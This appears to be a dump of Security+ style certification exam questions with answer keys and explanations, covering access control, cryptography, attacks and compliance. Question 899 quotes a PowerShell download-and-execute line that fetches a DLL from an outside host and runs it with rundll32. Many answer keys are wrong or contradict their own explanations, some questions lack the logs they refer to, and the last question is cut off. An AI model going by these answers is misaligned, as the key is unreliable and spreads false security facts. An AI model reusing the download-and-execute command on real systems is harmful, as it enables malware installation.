sec +

QUESTION 888 A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.) A. IPSec B. SFTP C. SRTP D. LDAPS E. S/MIME F. SSL VPN

Answer: AF

QUESTION 899 An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll Which of the following BEST describes what the analyst found? A PowerShell code is performing a DLL injection. B. A PowerShell code is displaying a picture. C. A PowerShell code is configuring environmental variables. D. A PowerShell code is changing Windows Update settings.

A. A PowerShell code is performing a DLL injection. B. A PowerShell code is displaying a picture. C. A PowerShell code is configuring environmental variables. D. A PowerShell code is changing Windows Update settings. Answer: A Remote server using PowerShell and saving it as "autoupdate.dll" in the user's temporary folder. It then executes the file using the "rundll32.exe" program, which suggests that the file is being used to perform some sort of malicious activity.

QUESTION 804 A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL was discovered. Which of the following should be done FIRST to prevent other users from accessing the malicious URL? A. Configure the web content filter for the web address. B. Report the website to threat intelligence partners C. Set the SIEM to alert for any activity to the web address. D. Send out a corporate communication to warn all users of the malicious email.

Answer: A

QUESTION 832 A Chief Information Officer is concerned about employees using company-issued laptops lo steal data when accessing network shares. Which of the following should the company Implement? A. DLP B. CASB C. HIDS D. EDR E. UEFI

Answer: A

QUESTION 855 Which of the following controls would provide the BEST protection against tailgating? A. Access control vestibule B. Closed-circuit television C. Proximity card reader D. Faraday cage

Answer: A

QUESTION 870 A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer's operating system has been hardened and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the security engineer configure to BEST protect the kiosk computer? A. Measured boot B. Boot attestation C. UEFI D. EDR

Answer: A

QUESTION 871 An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops? A. TPM B. CA C. SAML D. CRL

Answer: A

QUESTION 873 An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is the MOST likely cause for the high number of findings? A. The vulnerability scanner was not properly configured and generated a high number of false positives. B. Third-party libraries have been loaded into the repository and should be removed from the codebase. C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

Answer: A

QUESTION 878 After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST describes the incident? A. Supply chain attack B. Ransomware attack C. Cryptographic attack D. Password attack

Answer: A

QUESTION 882 The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable? A. SSO B. MFA C. PKI D. DLP

Answer: A

QUESTION 885 The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement? A. NAC B. ACL C. WAF D. NAT

Answer: A

QUESTION 889 A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company? A. SaaS B. IaaS C. PaaS D. SDN

Answer: A

QUESTION 891 A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider? A. Mandatory B. Rule-based C. Discretionary D. Role-based

Answer: A

QUESTION 850 A security analyst needs an overview of vulnerabilities for a host on the network. Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running? A. Non-credentialed B. Web application C. Privileged D.Internal

Answer: A A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the OS or application. The view obtained is the one that the host exposes to an unprivileged user on the network. The test routines may be able to include things such as using default passwords for service accounts and device management interfaces, but they are not given privileged access. While you may discover more weaknesses with a credentialed scan, you sometimes will want to narrow your focus to think like an attacker who doesn't have specific high-level permissions or total administrative access. Non-credentialed scanning is often the most appropriate technique for external assessment of the network perimeter or when performing web application scanning.

QUESTION 827 A company recently experienced a major breach. An investigation concludes that customer credit card data was stolen and exfiltrated through a dedicated business partner connection to a vendor, who is not held to the same security control standards. Which of the following is the MOST likely source of the breach? A. Side channel B. Supply chain C. Cryptographic downgrade D. Malware

Answer: A A side-channel attack (SCA) is a security exploit that attempts to extract secrets from a chip or a system. This can be achieved by measuring or analyzing various physical parameters. Examples include supply current, execution time, and electromagnetic emission. These attacks pose a serious threat to modules that integrate cryptographic systems. Indeed, many side-channel analysis techniques have proven successful in breaking an algorithmically robust cryptographic operation and extracting the secret key. A cryptographic downgrade such as using SSLv3.0 instead of TLS V1.2 or 1.3 would suggest the company which lost the data has a lower security standard. The question implies they are held to a higher security standard.

QUESTION 905 Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the email to others? A. Hoaxing B. Pharming C. Watering-hole D. Phishing

Answer: A A virus hoax is a false warning about a computer virus. Typically, the warning arrives in an email note or is distributed through a note in a company's internal network. These notes are usually forwarded using distribution lists, and they will typically suggest that the recipient forward the note to other distribution lists.

QUESTION 900 Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise? A. White team B. Purple team C. Green team D. Blue team E. Red team

Answer: A A white-team is typically defined as the referees in a penetration test or security assessment exercise. They establish the RoE, other guidelines, and boundaries of the security evaluation. They oversee the event and ensure that both sides of the simulated conflict/breach/intrusion are operating by the rules. They also facilitate communication between the blue-team and red-team.

QUESTION 815 A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause? A. Security patches were uninstalled due to user impact. B. An adversary altered the vulnerability scan reports. C. A zero-day vulnerability was used to exploit the web server. D. The scan reported a false negative for the vulnerability.

Answer: A A zero-day vulnerability is a vulnerability in a system or device that has been disclosed but is not yet patched. So if it is patched, is not a zero-day.

QUESTION 859 The compliance team requires an annual recertification of privileged and non-privileged user access. However, multiple users who left the company six months ago still have access. Which of the following would have prevented this compliance violation? A. Account audits B. AUP C. Password reuse D. SSO

Answer: A Account audits are periodic reviews of user accounts to ensure that they are being used appropriately and that access is being granted and revoked in accordance with the organization's policies and procedures. If the compliance team had been conducting regular account audits, they would have identified the users who left the company six months ago and ensured that their access was revoked in a timely manner. This would have prevented the compliance violation caused by these users still having access to the company's systems. To prevent this compliance violation, the company should implement account audits. An account audit is a regular review of all user accounts to ensure that they are being used properly and that they are in compliance with the company's security policies. By conducting regular account audits, the company can identify inactive or unused accounts and remove access for those users. This will help to prevent compliance violations and ensure that only authorized users have access to the company's systems and data.

QUESTION 868 A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST? A. Drop B. Reject C. Log alert D. Permit

Answer: A In the Drop action, no message is sent describing why the package was dropped. In the Reject action, a message is sent to the source describing the reason for the rejection

QUESTION 834 A dynamic application vulnerability scan identified that code injection could be performed using a web form. Which of the following will be the BEST remediation to prevent this vulnerability? A. Implement input validations. B. Deploy MFA. C. Utilize a WAF. D.ConfigureHIPS

Answer: A Input validation is the primary defense for online attacks against public facing web servers. A web application firewall (WAF) Is secondary and additional protection

QUESTION 845 Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyber intrusions, phishing, and other malicious cyber activity? A. Intelligence fusion B. Review reports C. Log reviews D. Threat feeds

Answer: A Intelligence fusion and threat data—threat hunting can be performed by manual analysis of network and log data, but this is a very lengthy process. An organization with a security information and event management (SIEM) and threat analytics platform can apply intelligence fusion techniques. The analytics platform is kept up to date with a TTP and IoC threat data feed. Analysts can develop queries and filters to correlate threat data against on-premises data from network traffic and logs. This process may also be partially or wholly automated using AI-assisted analysis and correlation.

QUESTION 901 A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose? A. MAC filtering B. Anti-malware C. Translation gateway D. VPN

Answer: A MAC filtering is a security method based on access control. In this, each address is assigned a 48-bit address which is used to determine whether we can access a network or not.

QUESTION 800 After a recent external audit, the compliance team provided a list of several non-compliant systems that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern? A. PCI DSS B. GDPR C. ISO 27001 D. NIST CSF

Answer: A NIST Cybersecurity Framework A cybersecurity framework (CSF) is a list of activities and objectives undertaken to mitigate risks. The use of a framework allows an organization to make an objective statement of its current cybersecurity capabilities, identify a target level of capability, and prioritize investments to achieve that target. This is valuable for giving a structure to internal risk management procedures and provides an externally verifiable statement of regulatory compliance. Frameworks are also important because they save an organization from building its security program in a vacuum, or from building the program on a foundation that fails to account for important security concepts.

QUESTION 894 Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked? A. nmap B. tracert C. ping D. ssh

Answer: A Nmap help identify if traffic is being blocked between two devices

QUESTION 898 A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user's list of cron jobs: */10 * * * * root /writable/update.sh Which of the following actions should the penetration tester perform NEXT? A. Privilege escalation B. Memory leak C. Directory traversal D. Race condition

Answer: A The penetration tester has discovered a cron job that runs every 10 minutes as the root user and executes the script /writable/update.sh. This suggests that the update.sh script has write permissions in a directory that is writable by the current user. Therefore, the next logical step for the penetration tester would be to review the contents of the /writable directory and the update.sh script to determine if there are any vulnerabilities that can be exploited to escalate privileges or otherwise compromise the system

QUESTION 807 In a phishing attack, the perpetrator is pretending to be someone in a position of power to influence the target to click or follow the desired response. Which of the following principles is being used? A. Authority B. Intimidation C. Consensus D.Scarcity

Answer: A The principle of consensus or social proof refers to the fact that without an explicit instruction to behave in a certain way, many people will act just as they think others would act. A social engineering attack can use this instinct either to persuade the target that to refuse a request would be odd ("That's not something anyone else has ever said no to") or to exploit polite behavior to slip into a building while someone holds the door for them.

QUESTION 864 Which of the following is a cryptographic concept that operates on a fixed length of bits? A. Block cipher B. Hashing C. Key stretching D.Salting

Answer: A block cipher A type of symmetric encryption that encrypts data one block at a time, often in 64-bit or 128-bit blocks.

QUESTION 831 Which of the following controls would be the MOST cost-effective and time-efficient to deter intrusions at the perimeter of a restricted, remote military training area? (Choose two.) A. Barricades B. Thermal sensors C. Drones D. Signage E. Motion sensors F. Guards G.Bollards

Answer: AD Guards would deter intrusions but the question suggests cost- effective. People can walk between bollards.

QUESTION 839 A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of the following solutions should the engineer implement FIRST? (Choose two.) A. Auto-update B. HTTP headers C. Secure cookies D. Third-party updates E. Full disk encryption F. Sandboxing G. Hardware encryption

Answer: AD The OWASP Top Ten List is a well-known resource that highlights some of the most common and impactful vulnerabilities that appear in applications (with a focus on web applications). The current version of the OWASP Top Ten list was released in 2021 and includes the following ten vulnerabilities: 1.Broken Access Control 2. Cryptographic Failures 3. Injection 4. Insecure Design 5.Security Misconfiguration 6 Vulnerable and Outdated Components 7. Identification and Authentication Failures 8. Software and Data Integrity Failures 9. Security Logging and Monitoring Failures 10. Server-Side Request Forgery

QUESTION 805 An attacker browses a company's online job board attempting to find any relevant information regarding the technologies the company uses. Which of the following BEST describes this social engineering technique? A. Hoax B. Reconnaissance C. Impersonation D.pretexting

Answer: B

QUESTION 820 A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees' concerns? A. Enable the remote-wiping option in the MDM software in case the phone is stolen. B. Configure the MDM software to enforce the use of PINs to access the phone. C. Configure MDM for FDE without enabling the lock screen. D. Perform a factory reset on the phone before installing the company's applications.

Answer: B

QUESTION 847 As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements? A. https://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022 B. https://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022 C. https://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 D. https://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00

Answer: B

QUESTION 851 Which of the following identifies the point in time when an organization will recover data in the event of an outage? A. ALE B. RPO C. MTBF D. ARO

Answer: B

QUESTION 861 During a forensic investigation, a security analyst discovered that the following command was run on a compromised host: Which of the following attacks occurred? A. Buffer overflow B. Pass the hash C. SQL injection D. Replay attack

Answer: B

QUESTION 866 A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST describes the type of malware that is running? A. Fileless virus B. Logic bomb C. Keylogger D. Ransomware

Answer: B

QUESTION 874 A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue? A. Privilege creep B. Unmodified default settings C. TLS protocol vulnerabilities D. Improper patch management

Answer: B

QUESTION 875 A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor MOST likely be required to review and sign? A. SLA B. NDA C. MOU D. AUP

Answer: B

QUESTION 877 Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to? A. Backdoor B. Brute-force C. Rootkit D. Trojan

Answer: B

QUESTION 886 A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS? A. The time needed for the MRI vendor to upgrade the system would negatively impact patients. B. The MRI vendor does not support newer versions of the OS. C. Changing the OS breaches a support SLA with the MRI vendor. D. The IT team does not have the budget required to upgrade the MRI scanner.

Answer: B

QUESTION 887 A company received a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with? A. NIST CSF B. GDPR C. PCI DSS D. ISO 27001

Answer: B

QUESTION 892 An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it? A. Data custodian B. Data controller C. Data protection officer D. Data processor

Answer: B

QUESTION 893 Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints? A. Firewall B. SIEM C. IPS D. Protocol analyzer

Answer: B

QUESTION 902 A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider? A. Hashing B. Salting C. Lightweight cryptography D. Steganography Answer: B

Answer: B

QUESTION 816 Which of the following BEST describes the process of documenting who has access to evidence? A. Order of volatility B. Chain of custody C. Non-repudiation D. Admissibility

Answer: B A chain of custody is a chronological paper trail documenting when, how,and by whomindividual items of physical or electronic evidence - such as cell phonelogs - were collected, handled, analyzed,orotherwise controlled during an investigation

QUESTION 822 A security engineer is concerned that the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer would like a tool to monitor for changes to key files and network traffic on the device. Which of the following tools BEST addresses both detection and prevention? A. NIDS B. HIPS C. AV D. NGFW

Answer: B A host-based intrusion prevention system (HIPS) is a system or a program employed to protect critical computer systems containing crucial data against viruses and other Internet malware. Starting from the network layer all the way up to the application layer, HIPS protects from known and unknown malicious attacks.

QUESTION 906 A security analyst reviews web server logs and notices the following lines: Which of the following vulnerabilities has the attacker exploited? (Choose two.) A. Race condition B. LFI C. Pass the hash D. XSS E. RFI F. Directory traversa

Answer: BF

QUESTION 825 A company has a flat network that is deployed in the cloud. Security policy states that all production and development servers must be segmented. Which of the following should be used to design the network to meet the security requirements? A. CASB B. VPC C. Perimeter network D. WAF

Answer: B A virtual private cloud is an on-demand configurable pool of shared resources allocated within a public cloud environment, providing a certain level of isolation between the different organizations using the resources. Security policy states that all production and development servers must be segmented You could use multiple VPCs within your cloud environment to segment the network.

QUESTION 841 An employee received multiple messages on a mobile device. The messages instructing the employee to pair the device to an unknown device. Which of the following BEST describes what a malicious person might be doing to cause this issue to occur? A. Jamming B. Bluesnarfing C. Evil twin D. Rogue access point

Answer: B Bluesnarfing refers to using an exploit in Bluetooth to steal information from someone else's phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism. Even without an exploit, a short (4 digit) PIN code is vulnerable to brute force password guessing. Jamming causes a Denial of Service. Evil twin and Rogue access point suggests WiFi.

QUESTION 812 The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees' workstations to prevent information from leaving the company's network? A. HIPS B. DLP C. HIDS D. EDR

Answer: B DLP enables businesses todetect data loss,as well as prevent the illicittransferof data outside the organization and the unwanted destruction ofsensitive or personally identifiable data (PII).

QUESTION 814 A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place? A. Input validation B. Dynamic code analysis C. Fuzzing D. Manual code review

Answer: B Dynamic analysis means that the application is tested under "real world" conditions using a staging environment.

QUESTION 810 A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst to use? A. SSAE SOC 2 B. ISO 31000 C. NIST CSF D. GDPR

Answer: B ISO 31000 - The ISO 31000 Risk Management framework is an international standard that provides businesses with guidelines and principles for risk management from the International Organization for Standardization. Regulatory compliance initiatives are usually specific to a particular country and applicable to certain sized businesses or businesses in specific industries. However, ISO 31000 is designed to be used in organizations of any size. Its concepts work equally well in the public and the private sector, in large or small businesses and nonprofit organizations.

QUESTION 829 The Chief information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches. Which of the following choices BEST meets the requirements? A. SAML B. TACACS+ C. Password vaults D.OAuth

Answer: B RADIUS is used primarily for network access control. AAA services are also used for the purpose of centralizing logins for the administrative accounts for network appliances. This allows network administrators to be allocated specific privileges on each switch, router, access point, and firewall. Whereas RADIUS can be used for this network appliance administration role, the Cisco-developed Terminal Access Controller Access-Control System Plus (TACACS+) is specifically designed for this purpose (https://www.cisco.com/c/en/us/support/docs/security-vpn/remote-authentication-dialuser-service-radius/13838-10.html):

QUESTION 843 Which of the following authentication methods is considered to be the LEAST secure? A. TOTP B. SMS C. HOTP D. Token key

Answer: B The Short Message Service (SMS) and Multimedia Message Service (MMS) are operated by the cellular network providers. They allow transmission of text messages and binary files. Vulnerabilities in SMS and the SS7 signaling protocol that underpins it have cast doubt on the security of 2-step verification mechanisms.

QUESTION 896 A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as: A. a rootkit. B. a PUP. C. a backdoor. D. ransomware. E. a RAT.

Answer: B The mining software was MOST likely being classified by the antivirus application as a Potentially Unwanted Program (PUP).

QUESTION 826 A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available? A. Adding a new UPS dedicated to the rack B. Installing a managed PDU C. Using only a dual power supplies unit D. Increasing power generator capacity

Answer: B The power circuits supplying grid power to a rack, network closet, or server room must be enough to meet the load capacity of all the installed equipment, plus room for growth. Consequently, circuits to a server room will typically be higher capacity than domestic or office circuits (30 or 60 amps as opposed to 13 amps, for instance). These circuits may be run through a power distribution unit (PDU). These come with circuitry to "clean" the power signal, provide protection against spikes, surges, and brownouts, and can integrate with uninterruptible power supplies (UPSs). Managed PDUs support remote power monitoring functions, such as reporting load and status, switching power to a socket on and off, or switching sockets on in a particular sequence.

QUESTION 819 A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this wireless network. Which of the following protocols should the engineer implement to ensure the STRONGEST encryption? A. WPS B. WPA2 C. WAP D. HTTPS

Answer: B WPA2 and CCMP The Wi-Fi Alliance developed Wi-Fi Protected Access 2 (WPA2) to replace earlier cryptographic protocols. WPA2 (also known as IEEE 802.11i) uses strong cryptographic protocols such as Advanced Encryption Standard (AES) and Counter-mode/CBC-MAC Protocol (CCMP

QUESTION 802 While investigating a recent security incident, a security analyst decides to view all network connections on a particular server. Which of the following would provide the desired information? A. arp B. nslookup C. netstat D.nmap

Answer: C

QUESTION 808 A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab. The researchers collaborate with other machines using port 445 and, on the Internet, using port 443. The unauthorized software is starting to be seen on additional machines outside of the lab and is making outbound communications using HTTPS and SMB. The security team has been instructed to resolve the problem as quickly as possible causing minimal disruption to the researchers. Which of the following contains the BEST course of action in this scenario? A. Update the host firewalls to block outbound SMB. B. Place the machines with the unapproved software in containment. C. Place the unauthorized application in a blocklist. D. Implement a content filter to block the unauthorized software communication.

Answer: C

QUESTION 821 A penetration tester is brought on site to conduct a full attack simulation at a hospital. The penetration tester notices a WAP that is hanging from the drop ceiling by its cabling and is reachable. Which of the following recommendations would the penetration tester MOST likely make given this observation? A. Employ a general contractor to replace the drop-ceiling tiles. B. Place the network cabling inside a secure conduit. C. Secure the access point and cabling inside the drop ceiling. D.Utilize only access points that have internal antennas

Answer: C

QUESTION 828 A systems engineer is building a new system for production. Which of the following is the FINAL step to be performed prior to promoting to production? A. Disable unneeded services. B. Install the latest security patches. C. Run a vulnerability scan. D. Encrypt all disks.

Answer: C

QUESTION 835 A junior security analyst is reviewing web server logs and identifies the following pattern in the log file: Which of the following types of attacks is being attempted and how can it be mitigated? A. XSS, implement a SIEM B. CSRF, implement an IPS C. Directory traversal implement a WAF D. SQL infection, implement an IDS

Answer: C

QUESTION 838 An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the is following MOST likely reason for this type of assessment? A. An international expansion project is currently underway. B. Outside consultants utilize this tool to measure security maturity. C. The organization is expecting to process credit card information. D. A government regulator has requested this audit to be completed

Answer: C

QUESTION 852 Which of the following is required in order for an IDS and a WAF to be effective on https traffic? A. Hashing B. DNS sinkhole C. TLS inspection D. Data masking

Answer: C

QUESTION 872 A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met: - All actions performed by the network staff must be logged. - Per-command permissions must be possible. - The authentication server and the devices must communicate through TCP. Which of the following authentication protocols should the analyst choose? A. Kerberos B. CHAP C. TACACS+ D. RADIUS

Answer: C

QUESTION 879 Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization's hardware. Which of the following controls is described in this scenario? A. Compensating B. Deterrent C. Preventive D. Detective

Answer: C

QUESTION 884 A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack? A. Reconnaissance B. Impersonation C. Typosquatting D. Watering-hole

Answer: C

QUESTION 895 As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results: - The exception process and policy have been correctly followed by the majority of users. - A small number of users did not create tickets for the requests but were granted access. - All access had been approved by supervisors. - Valid requests for the access sporadically occurred across multiple departments. - Access, in most cases, had not been removed when it was no longer needed. Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame? A. Create an automated, monthly attestation process that removes access if an employee's supervisor denies the app. B. Remove access for all employees and only allow new access to be granted if the employee's supervisor approves it. C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the manager. D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB.

Answer: C

QUESTION 823 An organization is repairing the damage after an incident. Which of the following controls is being implemented? A. Detective B. Preventive C. Corrective D. Compensating

Answer: C A compensating control, also called an alternative control, is a mechanism that is put in place to satisfy the requirement for a security measure that is deemed too difficult or impractical to implement at the present time.

QUESTION 869 A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would MOST likely contain language that would prohibit this activity? A. NDA B. BPA C. AUP D. SLA

Answer: C An acceptable use policy (AUP) is a document stipulating constraints and practices that a user must agree to for access to a corporate network, the internet or other resources

QUESTION 854 A security architect is implementing a new email architecture for a company. Due to security concerns, the Chief Information Security Officer would like the new architecture to support email encryption, as well as provide for digital signatures. Which of the following should the architect implement? A. TOTP B. IMAP C. https D. S/MIME

Answer: D

QUESTION 801 An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users' corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment models is being utilized? A. MDM and application management B. BYOD and containers C. COPE and VDI D. CYOD and VMs

Answer: C Bring your own device (BYOD) - the mobile device is owned by the employee. The mobile will have to meet whatever profile is required by the company (in terms of OS version and functionality) and the employee will have to agree on the installation of corporate apps and to some level of oversight and auditing. This model is usually the most popular with employees but poses the most difficulties for security and network managers. Corporate owned, business only (COBO) - the device is the property of the company and may only be used for company business. Corporate owned, personally-enabled (COPE) - the device is chosen and supplied by the company and remains its property. The employee may use it to access personal email and social media accounts and for personal web browsing (subject to whatever acceptable use policies are in force). Choose your own device (CYOD) - much the same as COPE but the employee is given a choice of device from a list.

QUESTION 903 A company is launching a website in a different country to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming? A. Data owner B. Data processor C. Data steward D. Data collector

Answer: C Data steward - this role is primarily responsible for data quality. This involves tasks such as ensuring data is labeled and identified with appropriate metadata and that data is collected and stored in a format and with values that comply with applicable laws and regulations.

QUESTION 842 A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method? A. Disable Telnet and force SSH. B. Establish a continuous ping. C. Utilize an agentless monitor D.Enable SNMPv3 with passwords

Answer: C Network Monitoring is monitoring the health and status of servers and devices on a network. Some solutions require a software agent to be installed on each monitored device. Agentless Network Monitoring will do the same monitoring, but does not require any software installed on target devices or servers. Agentless network monitoring is generally preferred because it requires no configuration changes to the target device, and does not add one more piece of software that has to be managed.

QUESTION 848 A security administrator wants to implement a program that tests a user's ability to recognize attacks over the organization's email system. Which of the following would be BEST suited for this task? A. Social media analysis B. Annual information security training C. Gamification D.Phishing campaign

Answer: C Participants respond well to the competitive challenge of CTF events. This type of gamification can be used to boost security awareness for other roles too. Computerbased training (CBT) allows a student to acquire skills and experience by completing various types of practical activities: • Simulations—recreating system interfaces or using emulators so students can practice configuration tasks. • Branching scenarios—students choose between options to find the best choices to solve a cybersecurity incident or configuration problem

QUESTION 840 A security analyst reviews a company's authentication logs and notices multiple authentication failures. The authentication failures are from different usernames that share the same source IP address. Which of the password attacks is MOST likely happening? A. Dictionary B. Rainbow table C. Spraying D. Brute-force

Answer: C Password spraying is a horizontal brute-force online attack. This means that the attacker chooses one or more common passwords (for example, password or 123456) and tries them in conjunction with multiple usernames

QUESTION 811 Against the recommendation of the IT security analyst, a company set all user passwords on a server as `P@55w0rD`. Upon review of the /etc/passwd file, an attacker found the following: alice:a8df3b6c4fd75f0617431fd248f35191df8d237f bob:2d250c5b2976b03d757f324ebd59340df96aa05e chris:ea981ec3285421d014108089f3f3f997ce0f4150 Which of the following BEST explains why the encrypted passwords do not match? A. Perfect forward secrecy B. Key stretching C. Salting D. Hashing

Answer: C Salting refers to adding random data to the input of a hash function to guarantee a unique output. The set password, in this case, is already hashed so to further secure it salting is the next step in cryptography i.e. adding more security to the password. Salting passwords is a common method of preventing rainbow table attacks, along with other password attacks such as brute force and dictionary attacks. A salt is a set of random data such as two additional characters. Password salting adds these additional characters to a password before hashing it. These additional characters add complexity to the password, and result in a different hash than the system would create using only the original password. This causes password attacks that compare hashes with a rainbow table to fail. Remember this Birthday attacks exploit collisions in hashing algorithms. A hash collision occurs when the hashing algorithm creates the same hash from different passwords. Salting adds random text to passwords before hashing them and thwarts many password attacks, including rainbow table attacks. Key stretching is an advanced technique used to increase the strength of stored passwords. Instead of just adding a salt to the password before hashing it, key stretching applies a cryptographic stretching algorithm to the salted password. The benefit of key stretching is that it consumes more time and computing resources—frustrating attackers who are trying to guess passwords. Three common key stretching techniques are bcrypt, Password-Based Key Derivation Function 2 (PBKDF2), and Argon2

QUESTION 836 Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset Link. Which of the attacks is being used to target the company? A. Phishing B. Vishing C. Smishing D. Spam

Answer: C Smishing is a type of phishing attack which begins with an attacker sending a text message to an individual. The message contains social engineering tactics to convince the person to click on a malicious link or send sensitive information to the attacker. Criminals use smishing attacks for purposes like: Learn login credentials to accounts via credential phishing Discover private data like social security numbers Send money to the attacker Install malware on a phone Establish trust before using other forms of contact like phone calls or emails Attackers may pose as trusted sources like a government organization, a person you know, or your bank. And messages often come with manufactured urgency and time-sensitive threats. This can make it more difficult for a victim to notice a scam. Phone numbers are easy to spoof with VoIP texting, where users can create a virtual number to send and receive texts. If a certain phone number is flagged for spam, criminals can simply recycle it and use a new one.

QUESTION 813 On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized? A. Shoulder surfing B. Watering-hole attack C. Tailgating D.Impersonation

Answer: C Tailgating is following someone who has access to a secure into that area without having access yourself. Shoulder surfing is looking at information that someone who has access to it is looking at over their shoulder /while they have it open to view when you shouldn't otherwise have access to that information. This sounds more like Tailgating than Shoulder surfing for sure.

QUESTION 858 A security researcher is using an adversary's infrastructure and HTTPS and creating a named group to track those targeted. Which of the following is the researcher MOST likely using? A. The Cyber Kill Chain B. The incident response process C. The Diamond Model of Intrusion Analysis D. MITRE ATT&CK

